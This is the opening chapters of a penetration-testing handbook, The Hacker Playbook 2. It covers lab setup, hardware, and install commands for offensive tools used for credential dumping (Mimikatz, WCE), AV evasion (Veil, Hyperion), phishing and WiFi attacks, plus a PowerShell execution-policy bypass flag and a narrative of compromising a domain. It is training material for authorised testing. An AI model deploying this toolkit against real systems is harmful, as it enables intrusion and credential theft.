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Preface 


This is the second iteration of The Hacker Playbook (THP). For those that read the first book, this is 
an extension of that book. Below is an overview of all of the new vulnerabilities and attacks that will 
be discussed. In addition to the new content, attacks and techniques from the first book, which are still 
relevant today, are included to eliminate the need to refer back to the first book. So, what’s new? 
Some of the updated attacks from the last year and a half include: 

• Heartbleed 

• ShellShock 

• Kerberos issues (Golden Ticket/Skeleton Key) 

• PTH Postgres 

• New Spear Phishing 

• Better/Cheaper Dropboxes 

• Faster/Smarter Password Cracking 

• New WIFI attacks 

• Tons of Power Shell scripts 

• Privilege Escalation Attacks 

• Mass network compromises 

• Moving laterally smarter 

• Burp Modules 

• Printer Exploits 

• Backdoor Factory 

• ZAP Proxy 

• Sticky Keys 

• NoSQL Injection 

• Commercial Tools (Cobalt Strike, Canvas, Core Impact) 

• Lab sections 

• And so much more 


In addition to describing the attacks that have changed in the last couple years, I have attempted to 
incorporate all of the comments and recommendations received from readers of the first book into this 
second book. A more in-depth look into how to set up a lab environment in which to test your attacks 
is also given, along with the newest tips and tricks of penetration testing. Lastly, I tried to make this 
version easier to follow since many schools have incorporated my book into their curricula. 
Whenever possible, I have added lab sections that help provide a way to test a vulnerability or 
exploit. 


What’s not different? One of my goals from the first book was to make this as “real world” as 
possible. I really tried to stay away from theoretical attacks and focused on what I have seen from 
personal experience and what actually worked. The second goal was to strengthen your core 



understanding as a penetration tester. In other words, I wanted to encourage you to use different 
methods to boost your value to your current or future company or client. Just running a vulnerability 
scanner and submitting that as your report provides no real benefit to a company. Also, penetration 
tests with an extremely limited scope will give a false sense of security. To THP1 readers, rest 
assured that although you may find some familiar information, there is a great deal of new information 
in THP2, which has double the content compared to its predecessor. Additionally, by popular 
demand, I have created a slew of scripts and tools to help you in your hacking adventure. This was 
probably one of the top requests by readers, so I have included a ton of scripts located in my Github 
f https://github.com/cheetz ) and tried to make it easier to follow. 


For those who did not read the first book, you might be wondering what experience I have as a 
penetration tester. My background comes from eight years of penetration testing for major financial 
institutions, large utility companies, Fortune 500 entertainment companies, and government 
organizations. I have also spent years teaching offensive network security, spoken at 
Toorcon/Derbycon/BayThreat, been referenced in many security publications, and currently run a 
security community of over 300 members in Southern California. My hope is that you will be able to 
take what I have learned and incorporate it into your own security lifestyle. 


From a technical standpoint, many tools and attacks have changed in the past couple years. With 
attacks like pass-the-hash, and with Group Policy Preferences getting patched, the process and 
methods of attackers have changed. 

One important note is that I am using both commercial tools and open source. For every commercial 
tool, I try to give an open source counterpart. I occasionally run into some pentesters that say they 
only use open source tools. As a penetration tester, I find this a hard statement to take. If you are 
supposed to emulate a “real world” attack, the “bad guys” do not have these restrictions, then you 
need to use any tool that works to get the job done. 


Who is this book intended for? You need to have some experience with Microsoft Active Directory, a 
solid understanding of Linux, some networking background, some coding experience (Bash, Python, 
Perl, Ruby, PHP, C, or anything along that line), and using security tools like vulnerability scanners 
and exploit tools (i.e. Metasploit). If you don’t have the background, but are interested in getting into 
security, I would suggest making sure you have the basics down. You can’t just jump into security 
without the basic knowledge of how things work first. 


This book is not just for those looking to get into or who currently are in the offensive fields. This 
book provides valuable information and insight for incident responders as well, as they need to know 
how attackers think and what methods they use. 


Lastly, I want to discuss a bit about the difference between researchers and penetration testers. Many 
times, these two professions blend together, as both need to be knowledgeable in both areas. 
However, in this book, I separate the two areas slightly and focus on penetration testing. To clarify, in 



this book, a researcher is one who focuses on a single or limited scope and spends more time 
reversing the application/protocol/OS. Their goal is to discover an unknown exploit for that 
particular vulnerability. On the other hand (and remember this is a generalization), a penetration 
tester takes what is already known to compromise systems and applications. There will always be 
some overlap-a pentester will still fuzz vulnerabilities (for example, web parameters) and find zero- 
days-but he/she might not spend as much time finding all the issues as a researcher might. 


Last Notes and Disclaimer 


This book is not going to turn you into some sort of super hacker. It takes a lot of practice, research, 
and a love for the game. This book will hopefully make you think outside the box, become more 
creative, and help grow your understanding of flaws that occur in systems. 


Just remember, ONLY test systems on which you have written permission. Just Google the term 
“hacker jailed” and you will see plenty of different examples where young teens have been sentenced 
to years in prison for what they thought was a “fun time.” There are many free platforms where legal 
hacking is allowed and will help you further educate yourself. 



Introduction 


You have been hired as a penetration tester for a large industrial company called Secure Universal 
Cyber Kittens, Inc. or SUCK, for short. They are developing future weapons to be used by the highest 
bidder and you have been given the license to kill.. .okay, maybe not kill, but the license to hack. This 
authorization gives you full approval to use any tactic in your arsenal to try to break into and steal the 
company’s trade secrets. 

As you pack your laptop, drop boxes, rubber duckies, Proxmarks, and cables, you almost forget the 
most important thing...The Hacker Playbook 2 (THP). You know that THP will help get you out of 
some of the stickiest situations. Your mind begins hazing back to your last engagement... 


After cloning some badges and deploying your drop box on the network, you run out of the office, 
barely sneaking past the security guards. Your drop box connects back to your SSH server and now 
you are on their network. You want to stay pretty quiet on the network and not trigger any IDS 
signatures. What do you look for? You flip to the Before the Snap chapter and remember printers! 
You probe around for a multifunction printer and see that it is configured with default passwords. 
Great! You re-configure LDAP on the printer, set up your netcat listener, and obtain Active Directory 
credentials. Since you don’t know what permissions these credentials have, you try to psexec to a 
Windows machine with a custom SMBexec payload. The credentials work and you are now a regular 
user. After a couple tricks with PowerTools in the Lateral Pass section, you move to local admin and 
pull passwords from memory with Mimikatz. Phew... you sigh... this is too easy. After pulling 
passwords for a few accounts, you find where the domain admins (DA) are and connect to their boxes 
to pull passwords again. With domain admin creds, it is pretty straightforward to dump the Domain 
controller (DC) withpsexec ntdsgrab and then clear your tracks... 


Glad you didn’t forget your copy of THP! 


Standards 


Before we can dive into THP, we need to understand some of the basics and standards used for 
penetration testing. This will be the foundation for recon, finding and exploiting vulnerabilities, and 
reporting. There really is no right way to perform an engagement, but you will need to at least cover 
the basics. 


The Penetration Testing Execution Standard 
(PTES - http ://www .pentest-standard.org/index.php L 


PTES is the current standard for performing penetration tests. These are referenced regularly and are 
the core elements in what goes on in an engagement. I highly recommend that you go through the entire 



PTES technical guideline as it is full of detailed information. The standard accepted model consists 
of seven main sections: 

1. Pre-engagement Interactions 

2. Intelligence Gathering 

3. Threat Modeling 

4. Vulnerability Analysis 

5. Exploitation 

6. Post Exploitation 

7. Reporting 


One thing I encourage you to do is to be creative and find what works for you. For me, although the 
PTES framework is a great model for performing penetration tests, I like taking penetration tests and 
tweaking the standard model. From experience, the standard I would typically use would look 
something like the following: 

1. Intelligence Gathering 

2. Initial Foothold 

3. Local/Network Enumeration 

4. Local Privilege Escalation 

5. Persistence 

6. Lateral Movement 

7. Domain Privilege Escalation 

8. Dumping Hashes 

9. Data Identification/Exfiltration 

10. Reporting 


This breakdown shows what I would perform and focus on during a penetration test. After the initial 
foothold via social engineering, the focus is to acquire a privileged account. To get there, you have to 
enumerate the system/network and look for misconfigurations or local vulnerabilities. We also need 
to implement persistence, just in case we end up losing our shells. Once at a system or elevated 
account, we need to see if we can acquire a domain-privileged account. To do this, we need to 
compromise other boxes to eventually get to a domain admin (DA) account. At a domain controller 
(DC), the best part of the test is to dump the domain hashes and take a quick break for a happy dance. 
This test should not end here. Where customer value really comes into play is going after sensitive 
data, especially personally identified information (PII), intellectual property (IP), or other 
information requested by the client. Lastly, since we all know that reporting pays the bills, having a 
good standard template and valuable data will set you apart from the competition. 


Of course, this was all a very quick and high-level example of what can occur during an assessment. 
To guide you through this process, I have tried to develop a format to help you on your path. The 
Hacker Playbook is setup with 11 different sections, laid out as a football playbook. But, do not 
worry, you don’t necessarily need to know the football terms in detail to follow along. Here is the 
breakdown: 



• Pregame: This is all about how to set up your lab, attacking machines, and the tools 
we will use throughout the book. 

• Before the Snap: Before you can run any plays, you need to scan your environment 
and understand what you are up against. We will dive into discovery and smart 
scanning. 

• The Drive: Take the vulnerabilities which were identified from Before the Snap 
and start exploiting those systems. This is where we get our hands a little dirty and 
start exploiting boxes. 

• The Throw: Sometimes you need to get creative and look for the open target. We 
will take a look at how to find and exploit manual web application findings. 

• The Lateral Pass: After you have compromised a system, we will discuss ways to 
move laterally through the network. 

• The Screen: A play typically used to trick the enemy. This chapter will explain 
social engineering tactics. 

• The Onside Kick: A deliberately short kick that requires close distance. Here, I will 
describe attacks that require physical access. 

• The Quarterback Sneak: When you only need a couple of yards, a quarterback sneak 
is perfect. Sometimes you will get stuck with antivirus (AV); this chapter describes 
how to get over those small hurdles by evading AV. 

• Special Teams: Cracking passwords, exploits, NetHunter and some tricks. 

• Two-Minute Drill: You have only two minutes on the clock and you need to go from 
no access to full domain admin. 

• Post-Game Analysis: Reporting your findings. 


Updates 


As we all know, security changes quickly and things break all the time. I try to keep up with all of the 
changes and any requests you might have. You can find updates here: 

Subscribe for Book Updates: 
http://thehackerplaybook.com/subscribe 

Twitter: @HackerPlaybook 
URL: http://TheHackerPlaybook.com 
Github: https://www.github.com/che etz 
Email: book@thehackerplaybook.com 





Pregame - The Setup 


Before we can start attacking Secure Universal Cyber Kittens, Inc. (SUCK), we need to build our 
testing lab to test our attacks, develop our attacking machines, and understand how our exploits work. 
Practice and testing are invaluable when it comes to running a full scale attack. You don’t want to be 
the average Joe on a test using untested exploits which inadvertently takes down a critical system, 
getting you identified and tossed out of the company. 


Building A Lab 


It might be hard to build a full lab with all the applications, operating systems, and network 
appliances, but you need to make sure you have the core components. These include basic Linux 
servers and Windows systems. 

Since Microsoft Windows operating systems aren’t free, you may have to purchase some software. If 
you are a student, you can generally get free software through your school. You can also check 
Microsoft DreamSpark (https://www.dreamspark.com/) to see if you qualify. I think with a default 
.edu email address you can get Windows 2012 and other software for free. 


Building Out A Domain 


Practicing on a Microsoft Active Directory (AD) environment is good; however, one of the best ways 
to learn is to build one yourself. Knowing how and why things work on an AD environment will help 
you later on in life. I have put together condensed step-by-step instructions on how to set up an AD 
domain controller that should get you up and running. For those who have never built a DC and client 
before, I highly recommend you do this first. Before you can really understand what you are attacking, 
you need to understand how it works. 

In the example provided below, I will install a Windows Domain Environment using Windows 2012 
R12, Windows 8 and Windows 7. In this book, I wanted to focus on the newer operating systems. 
However, if you are looking to test older exploits, you may want to consider installing Windows XP 
SP2. Check out my Active Directory installation guide here: 

http://www.thehackerplaybook.com/Windows_Domain.htm 


Building Out Additional Servers 

Below are the vulnerable virtual machines I recommend. Many of the 
labs in this book will use these two frameworks for testing. For your 



own practice, you should look at the other test servers mentioned at the 
end of this book. 

Metasploitable2 

This is a great vulnerable Ubuntu Linux virtual machine that 
intentionally contains common vulnerabilities. This is great for testing 
security tools, such as Metasploit, and demonstrating common attacks. 
It is relatively easy to set up as you just need to download the virtual 
machine (VM) and boot it in a Virtual Platform. 

• http ://sourceforge.net/proj ects/metasploitable/ files/MetaspL 

OWASPBWA (OWASP Broken Web Applications Project! 

While Metasploitable2 focuses on services, OWASPBWA is a great 
collection of vulnerable web applications. This is one of the most 
complete vulnerable web application collections in a single VM. This 
VM will be used for many of the web examples throughout the book. As 
with Metasploitable2, just download the vulnerable VM and boot it up. 

• http ://sourceforge.net/proj ects/owaspbwa/ files/ 


Practice 


Penetration testing is like any other profession and needs to be second nature. Every test is 
completely different and you need to be able to adapt with the changing environment. Without 
adequate practice, trying multiple different tools, and exploiting systems using different payloads, you 
won’t be able to adapt if you ever run into a brick wall. 


Building Your Penetration Testing Box 


In The Hacker Playbook One book, I received some comments on why I have you build and install 
the tools instead of creating one script to automate it all. The main reason I have my readers manually 
go through these steps is because these are extremely important tools and this will help you remember 
what is available in your own arsenal. Kali Linux, for example, has tons of tools and is well- 
organized, but if you don’t know the tool is installed or you haven’t played around with the individual 
attacks, then it won’t really be helpful in that dire need situation. 






Setting Up A Penetration Testing Box 


If you set up your box from the first book, you can breeze over this section. As you know, I always 
like bringing two different laptops to an engagement. The first is a Windows box and the second is 
either an OS X or Linux host. The reason I bring two laptops is because I have been on penetration 
tests where, on very specific networks, the OS X host would not connect to the network. Instead of 
spending hours trying to figure out why, I just started all of my attacks and scanning from my 
Windows host and fixed the OS X issue during any free time. I cannot tell you the countless times 
having two laptops has saved me. 

It doesn’t matter if you run Windows, OS X, or some Linux flavor on your base system, but there are a 
few musts. First, you need to install a Virtual Machine (VM) platform. You can use Virtual Box 
f https://www.virtualbox.org l or VMWare Player ( https://mv.vmwarc.com/wcb/vmwarc/downl oads l 

or any others of your choice. Both are free on Windows and only Virtual Box on OS X is free. I 
would highly recommend getting the commercial versions for your VM platform as they have a wealth 
of extra features, such as encryption, snapshots, and much better VM management. 


Since we are going to install most of our tools on our VMs, the most important step is to keep your 
base system clean. Try not to even browse personal sites on the base image. This way, your base 
system is always clean and you won’t ever bring malware onto a client site (I have seen this many 
times before), or have unknown vulnerable services listening. After configuring my hosts, I snapshot 
the virtual machine at the clean and configured state. This way, for any future tests, all I need to do is 
revert back to the baseline image, patch and update tools, and add any additional tools I need. Trust 
me, this tactic is a lifesaver. I can't count the number of past assessments where I spent way too much 
time setting up a tool that should have already been installed. 


Hardware 


Penetration Testing Laptop 

For your basic penetration laptop requirements, they haven’t changed much from the previous book. 

Basic recommendations: 

• Laptop with at least 8GB of RAM 

• 500GB hard drive (solid state is highly recommended) 

• Intel Quad Core i7 Processor 


Password Cracking Desktop 

This is completely optional, but with the number of tests where I have compromised hashes, faster 
password cracking equipment was required. Although, you could purchase some crazy rig with 8 






GPUs that runs on a Celeron processor, I have built a multi-purpose box with plenty of space and 
amazing password cracking power. Later in the book, I will go over the actual specs and tools I built 
out for password cracking and the reasons why I went this route. 


Password Cracking/Multi-purpose Hacking Box 


• Case: CORSAIR Vengeance C70 

• Video Card: SAPPHIRE 100360SR Radeon R9 295x2 8GB GDDR5 

• Hard Drive: SAMSUNG 840 EVO MZ-7TE500BW 2.5" 500GB SATA III TLC 
Internal SSD 

• Power Supply: SILVERSTONE ST 1500 1500W ATX 

• RAM: CORSAIR Vengeance Pro 16GB (2 x 8GB) 240-Pin DDR3 SDRAM DDR3 
1600 

• CPU: CORE 17 4790K4.0G 

• Motherboard: ASUS MAXIMUS VII FORMULA 

• CPU Cooler: Cooler Master Hyper 212 EV 

This is definitely overkill for just password cracking, since the only thing that really matters are the 
GPUs; but, again, I still wanted to use this as an additional system in my arsenal. 


Open Source Versus Commercial Software 


In this book, I thought it would be beneficial to include a comparison of open source and commercial 
software. Although not everyone has the funds to purchase commercial software, it is very important 
to know what is available and what an attacker might use. Both as a defender and someone who runs 
offensive plays, having the right tools can definitely make the difference. In this book, I will show you 
several different commercial software tools that I find very useful, which can assist in various types 
of offensive situations. With every commercial software, I will try to provide an open source 
companion, but it may not always be available. 

Commercial Software in The Hacker Plavbook 2 

• Burp Suite Pro 

• Canvas 

• Cobalt Strike 

• Core Impact 

• Nessus 

• Nexpose 


Kali Linux 

f https://www.kali.org/ I 

For those who have never used Kali Linux, it is often seen as the standard in offensive penetration 





testing. This Debian-based Linux distro contains a wealth of different security tools all preconfigured 
into a single framework. This is a great starting point for your offensive security platform and the 
book mainly builds off of this Linux distribution. I highly recommend that you download the virtual 
machine and use this for your testing. 


Back Box 

f http://www.backbox.orgA 

Although Kali Linux is seen as the standard, it is best to not ever rely on a single tool/OS/process— 
this will be a constant theme throughout the book. The developers could stop supporting a certain tool 
or, even worse, you begin to experience tunnel vision and rely on old methods. The guys over at Back 
Box are doing great work building and supporting another security platform. The main differences I 
can see is that Back Box is based on Ubuntu and more importantly, comes with default user rights 
management (instead of everyone running as root in Kali Linux). Some people are more comfortable 
with Ubuntu and I have gotten into situations where specific tools are developed for and run more 
stable on Ubuntu versus Kali. Again, it should be just another tool available at your reach and it is 
good to know what is out there. 


Setting Up Your Boxes 


There are many tools that are not included or that need to be modified from the stock tool set in any of 
the security distributions (distro). I like to put them in a directory where I know where they exist and 
can be used easily. Here are the tools that you will need to install. 

Recon/Scanning Tools 

• Discover 

• EyeWitness 

• HTTP ScreenShot 

• WMAP 

• SpiderFoot 

• Masscan 

• Gitrob 

• CMSmap 

• Recon-ng 

• SPARTA 

• WPScan 

• Password Lists 

Exploitation 

• Burp Suite Pro 

• ZAP Proxy Pro 

• NoSQLMap 

• SQLMap 




• SQLNinja 

• BeEF Exploitation Framework 

• Responder 

• Printer Exploits 

• Veil 

• WIFIPhisher 

• Wifite 

• SET 


Post Exploitation 

• Hacker Playbook 2 - Custom Scripts 

• SMBexec 

• Veil 

• WCE 

• Mimikatz 

• PowerSploit 

• Nishang 

• The Backdoor Factory 

• DSHashes 

• Net-Creds 


Setting Up Kali Linux 


There are many different ways you can set up your attacker host, but I want you to be able to mimic 
all of the examples in this book. Before going on, you should try to configure your host with the 
settings below. Remember that tools do periodically change and that you might need to make small 
tweaks to these settings or configurations. (Don’t forget to check the updates page at 

http://www.thehackerplaybook.com ) . For those users that have only purchased the physical book, I 
have copied the whole settings and software section to my Github 

f http://www.github.com/cheetz/thp2 ). This should make copying and pasting much easier, so you 
don’t have to type each command in by hand. 


Since this book is based off of the Kali Linux platform, you can download the Kali Linux distro from: 
http://www.kali.org/downloads/ . I highly recommend you download the VMware image 
f https://www.offcnsivc-sccurity.eom/kali-linux-vmwarc-arm-imagc-download/ l and download 
Virtual Player/VirtualBox. Remember that it will be a gz-compressed and tar archived file, so make 
sure to extract them first and load the vmx file. 


Once Your Kali VM is Up and Running 

• Log in with the username root and the default password toor 

• Open a terminal 







• Change the password 

o passwd 

• Update the image 

o apt-get update 
o apt-get dist-upgrade 

• Setup Metasploit database 

o service postgresql start 

• Make postgresql database start on boot 

o update-rc.d postgresql enable 

• Start and stop the Metasploit service (this will setup the database.yml file for you) 

o service metasploit start 
o service metasploit stop 

• Install gedit 

o apt-get install gedit 

• Change the hostname - Many network admins look for systems named Kali in logs 
like DHCP. It is best to follow the naming standard used by the company you are 
testing 

o gedit /etc/hostname 

■ Change the hostname (replace kali) and save 
o gedit /etc/hosts 

■ Change the hostname (replace kali) and save 

o reboot 

• *Optional for Metasploit - Enable Logging 

o I list this as optional since logs get pretty big, but you have the ability 
to log every command and result from Metasploit’s Command Line 
Interface (CLI). This becomes very useful for bulk attack/queries or if 
your client requires these logs. *If this is a fresh image, type 
msfconsole first and exit before configuring logging to create the .msf4 
folder. 

o Prom a command prompt, type: 

■ echo “spool /root/msfconsole.log” > 
/root/.msf4/msfconsole.rc 

o Logs will be stored at/root/msf_console.log 


Tool Installation 

The Backdoor factory: 

• Patch PE, ELP, Mach-O binaries with shellcode. 

• git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor- 
factory 

• cd the-backdoor-factory 

• ./install, sh 


HTTP ScreenShot 



SMBExec 


Masscan 


Gitrob 


• HTTP Screenshot is a tool for grabbing screenshots and HTML of large numbers of 
websites. 

• pip install selenium 

• git clone https://github.com/breenmachine/httpscreenshot.git /opt/httpscreenshot 

• cd /opt/httpscreenshot 

• chmod +x install-dependencies.sh && ./install-dependencies.sh 

• HTTPScreenShot only works if you are running on a 64-bit Kali by default. If you 
are running 32-bit PAE, install i686 phatomjs as follows: 

o wget https://bitbucket.org/ariya/ phantomj s/downloads/phantomj s- 

1.9.8-linux-i686.tar.bz2 

o bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2 

o tar xvfphantomjs-1.9.8-linux-i686.tar 

o cp phantomjs-1.9.8-linux-i686/birfphantomjs /usr/bin/ 


• A rapid psexec style attack with samba tools. 

• git clone https://github.com/pentestgeek/smbexec.git /opt/smbexec 

• cd /opt/smbexec && ./install.sh 

• Select 1 - Debian/Ubuntu and derivatives 

• Select all defaults 

• ./install, sh 

• Select 4 to compile smbexec binaries 

• After compilation, select 5 to exit 


• This is the fastest Internet port scanner. It can scan the entire Internet in under six 
minutes. 

• apt-get install git gee make libpcap-dev 

• git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan 

• cd /opt/masscan 

• make 

• make install 


• Reconnaissance tool for GitHub organizations 

• git clone https://github.com/michenriksen/gitrob.git /opt/gitrob 

• gem install bundler 

• service postgresql start 

• supostgres 

• createuser -s gitrob —pwprompt 

• createdb -O gitrob gitrob 

• exit 



• cd /opt/gitrob/bin 

• gem install gitrob 


CMSmap 

• CMSmap is a python open source CMS (Content Management System) scanner that 
automates the process of detecting security flaws 

• git clone https://github.com/Dionach/CMSmap /opt/CMSmap 

WPScan 

• WordPress vulnerability scanner and brute-force tool 

• git clone https://github.com/wpscanteam/wpscan.git/opt/wpscan 

• cd /opt/wpscan && ./wpscan.rb --update 

Eyewitness 

• EyeWitness is designed to take screenshots of websites, provide some server 
header info, and identify default credentials if possible. 

• git clone https://github.com/ChrisTruncer/EyeWitness.git/opt/EyeWitness 

Printer Exploits 

• Contains a number of commonly found printer exploits 

• git clone https://github.com/MooseDojo/praedasploit /opt/praedasploit 

SQLMap 

• SQL Injection tool 

• git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap 

Recon-ng 

• A full-featured web reconnaissance framework written in Python 

• git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git/opt/recon-ng 


Discover Scripts 

• Custom bash scripts used to automate various pentesting tasks. 

• git clone https://github.com/leebaird/discover.git /opt/discover 

• cd /opt/discover && ./setup.sh 

BeEF Exploitation Framework 

• A cross-site scripting attack framework 

• cd /opt/ 

• wget https://raw.github.com/beefproject/beeEa6a7536e/install-beef 

• chmod +x install-beef 



• ./install-beef 


Responder 

• A LLMNR, NBT-NS and MDNS poisoner, with built-in 
HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting 
NTLMv 1 /NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP 
authentication. Responder will be used to gainNTLM challenge/response hashes 

• git clone https://github.com/SpiderLabs/Responder.git /opt/Responder 

The Hacker Playbook 2 - Custom Scripts 

• A number of custom scripts written by myself for The Hacker Playbook 2. 

• git clone https://github.com/cheetz/Easy-P.git/opt/Easy-P 

• git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One 

• git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell Popup 

• git clone https://github.com/cheetz/icmpshock/opt/icmpshock 

• git clone https://github.com/cheetz/brutescrape /opt/brutescrape 

• git clone https://www.github.com/cheetz/reddit_xss /opt/reddit_xss 

The Hacker Playbook 2 - Forked Versions 

• Forked versions of PowerSploit and Powertools used in the book. Make sure you 
clone your own repositories from the original sources. 

• git clone https://github.com/cheetz/PowerSploit/opt/HP_PowerSploit 

• git clone https://github.com/cheetz/PowerTools /opt/HPPowerTools 

• git clone https://github.com/cheetz/nishang/opt/nishang 

DSHashes: 

• Extracts user hashes in a user-friendly format for NTDSXtract 

• wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O 

/ opt/NTDSXtract/ dshashes .py 

SPARTA: 

• A python GUI application which simplifies network infrastructure penetration 
testing by aiding the penetration tester in the scanning and enumeration phase. 

• git clone https://github.com/secforce/sparta.git/opt/sparta 

• apt-get install python-elixir 

• apt-get install ldap-utils rwho rsh-client xl 1-apps finger 

NoSQLMap 

• A automated pentesting toolset for MongoDB database servers and web 
applications. 

• git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap 



Spiderfoot 


• Open Source Footprinting Tool 

• mkdir /opt/spiderfoot/ && cd /opt/spiderfoot 

• wget http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0- 

src. tar. gz/do wnload 

• tar xzvf download 

• pip install lxml 

• pip install netaddr 

• pip install M2Crypto 

• pip install cherrypy 

• pip install mako 

WCE 

• Windows Credential Editor (WCE) is used to pull passwords from memory 

• Download from: http://www.ampliasecurity.com/research/windows-credentials- 
editor/ and save to /opt/. For example: 

o wget 

www.ampliasecurity.com/research/wce_vl_4beta_universal.zip 
o mkdir /opt/wce && unzip wce vl * -d /opt/wce && rmwce vl *.zip 

Mimikatz 

• Used for pulling cleartext passwords from memory, Golden Ticket, skeleton key and 
more 

• Grab the newest release from https://github.com/gentilkiwi/mimikatz/releases/latest 

o cd /opt/ && wget 

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip 
o unzip -d ./mimikatz mimikatz_trunk.zip 

SET 

• Social Engineering Toolkit (SET) will be used for the social engineering campaigns 

• git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/ 

• cd /opt/set && ./setup.py install 

PowerSploit (PowerShell) 

• PowerShell scripts for post exploitation 

• git clone https://github.com/mattifestation/PowerSploit.git/opt/PowerSploit 

• cd /opt/Power Sploit && wget 

https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py && 
wget 

https: / / raw. githubusercontent. com/ darkoperator/po wershellscripts/master/psencodei 






Nishang (PowerShell) 

• Collection of PowerShell scripts for exploitation and post exploitation 

• git clone https://github.com/samratashok/nishang /opt/nishang 


Veil-Framework 

• A red team toolkit focused on evading detection. It currently contains Veil-Evasion 
for generating AV-evading payloads, Veil-Catapult for delivering them to targets, and 
Veil-Power View for gaining situational awareness on Windows domains. Veil will be 
used to create a python based Meterpreter executable. 

• git clone https://github.com/Veil-Framework/Veil /opt/Veil 

• cd /opt/Veil/ && ./Install.sh-c 


Burp Suite Pro 

• Web Penetration Testing Tool 

• Download: http://portswigger.net/burp/proxy.html . I would highly recommend that 
you buy the professional version. It is well worth the $299 price tag. 

ZAP Proxy Pro 

• OWASP ZAP: An easy-to-use integrated penetration testing tool for discovering 
vulnerabilities in web applications. 

• Download from: https://code.google.com/p/zaproxy/wiki/Downloads?tm=2 

• *Included by default in Kali Linux (owasp-zap) 

Fuzzing Lists (SecLists) 

• These are scripts to use with Burp to fuzz parameters 

• git clone https://github.com/danielmiessler/SecLists.git /opt/SecLists 


Password Lists 

• For the different password lists, see the section: Special Teams - Cracking, 
Exploits, and Tricks 

Net-Creds Network Parsing 

• Parse PCAP files for username/passwords 

• git clone https://github.com/DanMcInerney/net-creds.git/opt/net-creds 
Installing Firefox Add-ons 

• Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web- 
developer/ 

• Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 

• Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 



• User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agent- 
switcher/ 


Wifite 

• Attacks against WiFi networks 

• git clone https://github.com/derv82/wifite /opt/wifite 

WIFIPhisher 

• Automated phishing attacks against WiFi networks 

• git clone https://github.com/sophron/wifiphisher.git/opt/wifiphisher 

Phishing (Optional): 

• Phishing-Frenzy 

o git clone https://github.com/pentestgeek/phishing-frenzy.git 
/var/www/phi shing-frenzy 

• Custom List of Extras 

o git clone https://github.com/macubergeek/gitlist.git/opt/gitlist 
*Remember to check http://thehackerplaybook.com/updates/ for any updates. 


Windows VM 


I highly recommend you also configure a Windows 7/8 Virtual Machine. This is because I have been 
on many tests where an application will require Internet Explorer or a tool like Cain and Abel, which 
will only work on one operating system. Remember, all of the PowerShell attacks will require you to 
run the commands on your Windows hosts. The point is to always be prepared because you will save 
yourself a lot of time and trouble having multiple operating systems available. 


High level tools 


list addition to Windows 

HxD (Hex Editor) 

Evade (Used for AV Evasion) 

Hyperion (Used for AV Evasion) 

Metasploit 

Nexpose/Nessus 

N map 

oclHashcat 

Cain and Abel 

Burp Suite Pro 

Nishang 

PowerSploit 

Firefox (Add-ons) 






o Web Developer Add-on 
o Tamper Data 
o Foxy Proxy 
o User Agent Switcher 

Setting Up Windows 

Setting up a Windows common testing platform should help complement your Kali Linux host. 

Remember to change your host names, disable NetBios if you don’t need it, and harden these boxes as 

much as possible. The last thing you want is to get owned during an assessment. 


There isn’t anything special that I setup on Windows, but usually I will install the following. 


• HxD http: / / mh- nexus. de/en/hxd/ 

• Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont 

• Hyperion http://www.nullsecurity.net/tools/binary.hhTil 

o Download/install a Windows Compiler 

http://sourceforge.net/projects/mingw/ 

o Run “make” in the extracted Hyperion folder and you should have the 
binary. 

• Download and install Metasploit http://www.Metasploit.com/ 

• Download and install either Nessus or Nexpose 

o If you are buying your own software, you should probably look into 
Nessus as it is much cheaper, but both work well 

• Download and install nmap hftp://nmap.org/download.html 

• Download and install oclHashcat http://hashcat.net/oclhashcat/ 

• Download and install Cain and Abel hhp://www.oxid.it/cain.html 

• Download Burp Proxy Pro http://portswigger.net/burp/download.html 

• Download and extract Nishang: https://github.com/samratashok/nishang 

• Download and extract PowerSploit: https://github.com/mattifestation/PowerSploit/ 

• Installing Firefox Addons 

o Web Developer Add-on: hftps://addons.mozilla.org/en-US/ 

firefox/ addon/ web-developer/ 

o Tamper Data: https: //addons .mozilla. or g/en-US/firefox/ 

addon/ tamper- data / 

o Foxy Proxy: https://addons.mozilla.org/en-US/firefox/ 

addon/ foxyproxy-standard / 

o User Agent Switcher: https://addons.mozilla.org/en-US/ 

firefox/addon/user-agent-switcher/ 


Power Up With Powershell 





















Power Shell has really changed the game on penetration testing. If you don’t have any experience with 
PowerShell, I would highly recommend you take some time and write some basic PowerShell scripts. 
If you need something to help get you in the PowerShell game, take a look at this video: 

• Intro to PowerShell Scripting for Security: http://bit.lv/lMCb7EJ 

The video is kind of long, but will get you some of the basics you need to get your PowerShelling off 
the ground. 

Why do I focus so much on PowerShell in this book? The benefits of PowerShell for a penetration 
tester: 

• Installed by default on Windows 7+ machines 

• PowerShell scripts can run in memory 

• Almost never triggers antivirus 

• Utilizes .NET Framework classes 

• Takes advantage of credentials of the user (for querying Active Directory) 

• Can be used to manage Active Directory 

• Remotely executes PowerShell scripts 

• Makes scripting Windows attacks much easier 

• Many tools are now being built in PowerShell and understanding it will make you a 
more powerful and efficient penetration tester 


You can always drop into a PowerShell command from a Windows terminal prompt by typing 
“powershell” and get to the help menu by typing “help” once inside PowerShell. Here are the basic 
flags and settings used throughout the book: 


• -Exec Bypass: Bypass Security Execution Protection 

o This one is extremely important! By default, PowerShell has an 
execution policy to not run PowerShell command/files. By running this 
command you bypass any of those settings. Throughout the book we 
will use this flag almost every time. 

